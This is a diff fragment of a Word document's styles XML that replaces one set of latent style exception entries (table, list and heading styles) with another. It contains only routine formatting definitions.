-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
